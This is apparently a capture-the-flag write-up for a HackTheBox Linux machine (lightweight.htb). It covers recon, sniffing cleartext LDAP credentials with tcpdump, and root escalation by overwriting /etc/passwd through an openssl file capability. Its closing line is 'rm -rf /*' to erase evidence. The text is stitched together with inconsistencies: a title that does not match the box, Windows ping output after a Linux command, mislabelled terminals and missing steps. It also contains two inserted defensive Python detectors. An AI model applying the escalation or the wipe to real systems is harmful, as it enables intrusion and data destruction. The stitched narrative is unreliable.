Explore is a medium-rated Linux machine from HackTheBox created by 0xEA31. In this post, my IP is 10.10.14.32 and the target IP is 10.129.95.236.
I liked this machine a lot, more than just researching to find a specific CVE or something like that. In the beginning the machine is open; you can get in without effort and then use various techniques to pivot between many users. It's good LDAP practice.
Recon
First, we check whether the machine is alive, then do the classic reconnaissance to gather some general information about the target.
Local Terminal
$ ping -c 1 10.129.95.236
Pinging 10.129.95.236 with 32 bytes of data:
Reply from 10.129.95.236: bytes=32 time=144ms TTL=63
Reply from 10.129.95.236: bytes=32 time=148ms TTL=63
Reply from 10.129.95.236: bytes=32 time=142ms TTL=63
Reply from 10.129.95.236: bytes=32 time=142ms TTL=63
Ping statistics for 10.129.95.236:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 142ms, Maximum = 148ms, Average = 144ms
From the TTL we assume it is a Linux machine (the value is around 64).
-p- --open scan all 65535 ports and report only the open ones
-T5 scan at maximum speed, a bit noisy
-v verbose, returns more information while scanning
-n do not apply DNS resolution, faster
Local Terminal
$ nmap -p- --open -T5 -v -n 10.129.95.236 -oG Ports
Completed SYN Stealth Scan at 09:30, 258.48s elapsed (65535 total ports)
Nmap scan report for 10.129.95.236
Host is up (0.15s latency).
Not shown: 65273 filtered tcp ports (no-response), 259 filtered tcp ports (host-prohibited)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
389/tcp open ldap
Read data files from: C:\Program Files (x86)\Nmap
Nmap done: 1 IP address (1 host up) scanned in 259.02 seconds
Raw packets sent: 131004 (5.764MB) | Rcvd: 301 (20.480KB)
-sC run the default Nmap scripts.
-sV return the versions of the services.
Local Terminal
$ nmap -sCV -p 22,80,389 10.129.95.236 -oN Target
Starting Nmap 7.92 ( https://nmap.org ) at 2023-05-26 09:32 Pacific SA Standard Time
Nmap scan report for 10.129.95.236
Host is up (0.15s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 19:97:59:9a:15:fd:d2:ac:bd:84:73:c4:29:e9:2b:73 (RSA)
| 256 88:58:a1:cf:38:cd:2e:15:1d:2c:7f:72:06:a3:57:67 (ECDSA)
|_ 256 31:6c:c1:eb:3b:28:0f:ad:d5:79:72:8f:f5:b5:49:db (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16)
|_http-title: Lightweight slider evaluation page - slendr
389/tcp open ldap OpenLDAP 2.2.X - 2.3.X
| ssl-cert: Subject: commonName=lightweight.htb
| Subject Alternative Name: DNS:lightweight.htb, DNS:localhost, DNS:localhost.localdomain
| Not valid before: 2018-06-09T13:32:51
|_Not valid after: 2019-06-09T13:32:51
|_ssl-date: TLS randomness does not represent time
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.63 seconds
Important information: {Domain : lightweight.htb}; modify your hosts file to map that domain to the target IP.
So we will be blocked if we try brute force, and this applies to dictionary attacks too. At this point we have to explore the website through view-source (CTRL+U).
In the source code there is a js/index.js; it is always a good idea to open that path in the browser, in case directory listing is enabled.
That is an interesting statement: we can log in via SSH with our IP address as username and password.
By hovering, we find a new URL, http://10.129.95.236/reset.php; it says it is just for resetting our username and password, so nothing to worry about.
But first, LDAP enumeration.
LDAP Enumeration
Running locate .nse in the terminal lists every Nmap script; here the goal is to run every LDAP-related script, so we filter with locate .nse | grep ldap.
By checking capabilities, we found tcpdump, which is interesting to play with, especially because we can trigger an account reset at reset.php to cause an interaction with us.
Target Terminal [10.10.14.32]
$ cd /tmp/
$ tcpdump -i any -w Capture.cap -v # Just a test, you can try "which tcpdump" too
$ rm Capture.cap
-i any capture on any interface
-w save the capture to the given file
-v verbose
That was just a test; now the best option is to capture the LDAP traffic on the target with tcpdump and inspect the result locally with Wireshark.
Target Terminal [10.10.14.32]
$ tcpdump -i lo port 389 -w capture.cap -v
Now play with the website: navigate everywhere, press all the buttons and, most importantly, trigger the reset at reset.php.
Then download the capture.cap file and explore its content with Wireshark.
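The reason capturing port 389 pays off is that an LDAP simple bind without TLS carries the bind DN and the password as cleartext BER strings, which is exactly what Wireshark shows in that capture. As an added example (not code from the original post), the following Python script builds a small constructed pcap containing such a bind to a local LDAP server and then scans it the way a detection job would: it walks the TCP segments addressed to port 389, decodes the LDAPMessage/BindRequest and reports every simple bind that carries a non-empty password. The DN, password and addresses are constructed sample values, and the pcap framing assumes the Ethernet link type that Linux also writes for captures on lo.

```python
"""Find cleartext LDAP simple binds in a pcap. Added example with constructed data,
not the capture from the box."""
import struct

LDAP_PORT = 389

# --- minimal BER (RFC 4511 LDAPMessage / BindRequest) ---
def ber_length(n):
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body

def ber(tag, value):
    return bytes([tag]) + ber_length(len(value)) + value

def read_tlv(buf, pos):
    """Return (tag, value, next_pos) for the TLV that starts at pos."""
    tag, first = buf[pos], buf[pos + 1]
    if first < 0x80:
        length, hdr = first, 2
    else:
        n = first & 0x7F
        length, hdr = int.from_bytes(buf[pos + 2:pos + 2 + n], "big"), 2 + n
    start = pos + hdr
    return tag, buf[start:start + length], start + length

def build_simple_bind(message_id, dn, password):
    """Encode LDAPMessage { messageID, bindRequest { version 3, name, simple } } (ids < 128)."""
    bind_request = ber(0x60,                            # [APPLICATION 0] BindRequest
                       ber(0x02, bytes([3]))            # version INTEGER 3
                       + ber(0x04, dn.encode())         # name: LDAPDN as OCTET STRING
                       + ber(0x80, password.encode()))  # authentication: simple [0], cleartext
    return ber(0x30, ber(0x02, bytes([message_id])) + bind_request)

def parse_simple_bind(payload):
    """Return {'message_id', 'dn', 'password'} for a simple BindRequest, else None."""
    try:
        tag, msg, _ = read_tlv(payload, 0)
        if tag != 0x30:
            return None
        tag, mid, pos = read_tlv(msg, 0)
        if tag != 0x02:
            return None
        tag, bind, _ = read_tlv(msg, pos)
        if tag != 0x60:
            return None                    # some other LDAP operation
        _, _version, pos = read_tlv(bind, 0)
        _, name, pos = read_tlv(bind, pos)
        tag, auth, _ = read_tlv(bind, pos)
        if tag != 0x80:
            return None                    # 0xA3 = SASL bind, no cleartext password here
    except IndexError:
        return None
    return {"message_id": int.from_bytes(mid, "big"),
            "dn": name.decode(errors="replace"),
            "password": auth.decode(errors="replace")}

# --- minimal pcap (link type 1 = Ethernet, which Linux also uses for captures on lo) ---
PCAP_GLOBAL = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)

def tcp_frame(src_ip, dst_ip, sport, dport, payload):
    """Ethernet + IPv4 + TCP frame with zero MACs and checksums (enough for parsing)."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 65535, 0, 0)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp) + len(payload), 1, 0, 64, 6, 0,
                     bytes(map(int, src_ip.split("."))), bytes(map(int, dst_ip.split("."))))
    return b"\x00" * 12 + b"\x08\x00" + ip + tcp + payload

def pcap_file(frames):
    out = bytearray(PCAP_GLOBAL)
    for i, frame in enumerate(frames):
        out += struct.pack("<IIII", 1_700_000_000 + i, 0, len(frame), len(frame)) + frame
    return bytes(out)

def tcp_payloads(pcap):
    """Yield (sport, dport, payload) for every TCP segment in a classic little-endian pcap."""
    if struct.unpack("<I", pcap[:4])[0] != 0xA1B2C3D4:
        raise ValueError("only classic little-endian pcap is handled here")
    pos = 24
    while pos + 16 <= len(pcap):
        incl = struct.unpack("<IIII", pcap[pos:pos + 16])[2]
        frame = pcap[pos + 16:pos + 16 + incl]
        pos += 16 + incl
        if frame[12:14] != b"\x08\x00":
            continue                                   # not IPv4
        ip = frame[14:]
        ihl, total_len = (ip[0] & 0x0F) * 4, struct.unpack("!H", ip[2:4])[0]
        if ip[9] != 6:
            continue                                   # not TCP
        tcp = ip[ihl:total_len]
        sport, dport = struct.unpack("!HH", tcp[:4])
        yield sport, dport, tcp[(tcp[12] >> 4) * 4:]

def find_cleartext_binds(pcap):
    """Detection logic: every simple bind to port 389 that carries a non-empty password."""
    hits = []
    for _sport, dport, payload in tcp_payloads(pcap):
        if dport != LDAP_PORT or not payload:
            continue
        bind = parse_simple_bind(payload)
        if bind and bind["password"]:
            hits.append(bind)
    return hits

# Constructed sample capture: one authenticated bind (what a password reset triggers) and one anonymous bind.
SAMPLE_PCAP = pcap_file([
    tcp_frame("127.0.0.1", "127.0.0.1", 40000, LDAP_PORT,
              build_simple_bind(1, "uid=sample_user,ou=People,dc=example,dc=htb", "S4mpl3P4ss")),
    tcp_frame("127.0.0.1", "127.0.0.1", 40001, LDAP_PORT, build_simple_bind(2, "", "")),
])

if __name__ == "__main__":
    for hit in find_cleartext_binds(SAMPLE_PCAP):
        print(f"msg {hit['message_id']}: bind DN {hit['dn']!r} password {hit['password']!r}")
```

Running it reports only the authenticated bind; the anonymous bind is parsed but skipped because it carries no secret. The same loop, pointed at a real capture.cap, is the check a defender would run to confirm that the web application binds to the directory over plain LDAP, and the fix is ldaps or StartTLS between reset.php and the directory server.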
[ldapuser1@lightweight ~]$ id
uid=1000(ldapuser1) gid=1000(ldapuser1) groups=1000(ldapuser1) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[ldapuser1@lightweight ~]$ sudo -l
[sudo] password for ldapuser1:
Sorry, user ldapuser1 may not run sudo on lightweight.
[ldapuser1@lightweight ~]$ getcap -r *
openssl =ep
tcpdump = cap_net_admin,cap_net_raw+ep
$ cd ~
$ cp /etc/passwd passwd
$ openssl passwd # Here I used 'hello' as password
Password: #hello
Verifying - Password: # hello
z4oRRkp3WBrCc # Save this
Local Terminal
$ hashid z4oRRkp3WBrCc
Analyzing 'z4oRRkp3WBrCc'
[+] DES(Unix)
[+] Traditional DES
[+] DEScrypt
Target Terminal [ldapuser1]
$ nano passwd
Replace the "X" with "z4oRRkp3WBrCc"
With this, the system will not look up the password hash in /etc/shadow (where it is stored with SHA-512; check on the target with grep "ENCRYPT_METHOD" /etc/login.defs) but will read it straight from /etc/passwd. With the capability on openssl, we can overwrite the password file.
Target Terminal [ldapuser1]
$ cat passwd | ./openssl enc -out /etc/passwd
# No message, it works.
$ cat /etc/passwd
root:z4oRRkp3WBrCc:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
<...>
$ su root # using hello as password
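The trick above works because the login stack only consults /etc/shadow when the password field of an /etc/passwd entry is "x"; any hash placed directly in that field is used as is, and a traditional DES crypt string is accepted even though login.defs configures SHA512. As an added example from the defender's side (not code from the original post), this Python script audits passwd-style entries for exactly that condition, flags empty password fields, and reads ENCRYPT_METHOD from login.defs text so the report can state what the system expects. The sample entries are constructed except for the edited root line shown above; the $6$ value is a placeholder, not a real hash.

```python
"""Audit passwd-style entries for hashes that bypass /etc/shadow. Added example with
constructed sample lines (the root line is the one produced above); not the box's files."""
import re

# 2-char salt + 11-char hash over [./0-9A-Za-z], the format 'openssl passwd' emits by default
TRADITIONAL_DES = re.compile(r"^[./0-9A-Za-z]{13}$")
MODULAR_CRYPT = {"$1$": "md5crypt", "$5$": "sha256crypt", "$6$": "sha512crypt",
                 "$y$": "yescrypt", "$2b$": "bcrypt"}

def classify_password_field(field):
    """Say what the second field of a passwd entry holds."""
    if field == "x":
        return "shadowed"            # the real hash lives in /etc/shadow
    if field[:1] in ("*", "!"):
        return "locked"
    if field == "":
        return "empty"               # no password at all
    for prefix, name in MODULAR_CRYPT.items():
        if field.startswith(prefix):
            return name
    if TRADITIONAL_DES.match(field):
        return "descrypt"
    return "unknown"

def encrypt_method(login_defs_text):
    """Return ENCRYPT_METHOD from /etc/login.defs text; login.defs(5) documents DES as the default when unset."""
    for line in login_defs_text.splitlines():
        parts = line.split()
        if len(parts) >= 2 and parts[0] == "ENCRYPT_METHOD":
            return parts[1].upper()
    return "DES"

def audit_passwd(passwd_text, configured_method="SHA512"):
    """Return (user, uid, reason) for entries whose password field is used directly instead of /etc/shadow."""
    findings = []
    for lineno, line in enumerate(passwd_text.splitlines(), 1):
        if not line or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) != 7:
            findings.append((None, None, f"line {lineno}: malformed entry with {len(parts)} fields"))
            continue
        user, field, uid = parts[0], parts[1], parts[2]
        kind = classify_password_field(field)
        if kind in ("shadowed", "locked"):
            continue
        if kind == "empty":
            reason = "empty password field: login without a password"
        elif kind == "unknown":
            reason = "unrecognised password field"
        else:
            reason = (f"{kind} hash stored in world-readable /etc/passwd instead of /etc/shadow"
                      f" (login.defs ENCRYPT_METHOD is {configured_method})")
            if kind == "descrypt":
                reason += "; traditional DES truncates the password to 8 characters"
        findings.append((user, uid, reason))
    return findings

# Constructed sample: the first line is the edited root entry shown above, the rest are made up;
# the $6$ value is a placeholder, not a real hash.
SAMPLE_PASSWD = """\
root:z4oRRkp3WBrCc:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
backup:$6$c0nstructed$placeholderhash:1001:1001::/home/backup:/bin/bash
guest::1002:1002::/home/guest:/bin/bash
svc:*:1003:1003::/:/sbin/nologin
"""
SAMPLE_LOGIN_DEFS = "# constructed excerpt of /etc/login.defs\nENCRYPT_METHOD SHA512\n"

if __name__ == "__main__":
    method = encrypt_method(SAMPLE_LOGIN_DEFS)
    for user, uid, reason in audit_passwd(SAMPLE_PASSWD, method):
        print(f"{user} (uid {uid}): {reason}")
```

On the sample it reports root (a DES hash sitting in passwd), backup (a SHA-512 hash that should be in shadow) and guest (no password), and stays silent on the shadowed and locked entries. As a file-integrity check it pairs naturally with monitoring for writes to /etc/passwd and with an inventory of file capabilities (getcap -r / on the host), since a binary carrying =ep is what made the overwrite possible here.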
Target Terminal [root]
$ cd /root
$ cat /root/root.txt
$ rm -rf /* # To remove all the evidence